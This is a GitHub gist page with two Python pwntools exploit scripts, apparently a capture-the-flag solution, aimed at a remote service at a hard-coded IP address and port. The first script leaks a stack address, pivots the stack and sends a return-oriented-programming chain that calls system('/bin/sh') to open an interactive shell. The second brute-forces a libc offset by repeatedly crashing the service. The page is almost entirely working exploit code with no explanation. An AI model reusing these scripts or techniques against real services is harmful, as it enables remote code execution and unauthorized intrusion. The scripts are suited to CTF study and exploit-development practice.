Skip to content

Instantly share code, notes, and snippets.

@cubarco
Last active December 30, 2015 04:30
Show Gist options
  • Save cubarco/569fd814a29d8ef988e1 to your computer and use it in GitHub Desktop.
Save cubarco/569fd814a29d8ef988e1 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from time import sleep
from struct import unpack
main_without_push_addr = 0x4004ee
p = remote('136.243.194.41', 666)
# leak stack address
p.send(p64(9))
sleep(0.1)
p.send('a'*9)
rbp_base_str = '\x00' + p.recvuntil('\x7f')[-5:] + '\x00'*2
rbp_base = unpack('Q', rbp_base_str)[0]
rbp_new_base = rbp_base - 0x500
__stack_chk_fail_addr = rbp_base - 0x4d11e0
system_addr = __stack_chk_fail_addr - 0xd4a50
pop_rdi_ret = __stack_chk_fail_addr - 0xf757e
print '[*] rbp_base: ' + hex(rbp_base)
# set rbp and rsp
payload1 = 'a' * 8
payload1 += p64(rbp_new_base) + p64(main_without_push_addr)
p.send(p64(len(payload1)))
sleep(0.1)
p.send(payload1)
ropchain = 'a' * 8
ropchain += '/bin/sh\x00'
ropchain += p64(pop_rdi_ret) + p64(rbp_new_base)
ropchain += p64(system_addr)
p.send(p64(len(ropchain)))
sleep(0.1)
p.send(ropchain)
p.interactive()
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
from time import sleep
from struct import unpack
main_without_push_addr = 0x4004ee
def shift_offsets():
for i in range(0, 20):
yield i * 0x1000
if i != 0:
yield i * -0x1000
for shift in shift_offsets():
p = remote('136.243.194.41', 666)
# leak stack address
p.send(p64(9))
sleep(0.1)
p.send('a'*9)
rbp_base_str = '\x00' + p.recvuntil('\x7f')[-5:] + '\x00'*2
rbp_base = unpack('Q', rbp_base_str)[0]
rbp_new_base = rbp_base - 0x500
__stack_chk_fail_addr = rbp_base - 0x4d41e0 + shift
print '[*] rbp_base: ' + hex(rbp_base)
# set rbp and rsp
payload1 = 'a' * 8
payload1 += p64(rbp_new_base) + p64(main_without_push_addr)
p.send(p64(len(payload1)))
sleep(0.1)
p.send(payload1)
ropchain = 'a' * 16
ropchain += p64(__stack_chk_fail_addr)
p.send(p64(len(ropchain)))
sleep(0.1)
p.send(ropchain)
ret = p.recvall()
if ret.find('stack smash') > -1:
print '[*] __stack_chk_fail offset: ' + hex(-0x4d41e0 + shift)
break
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment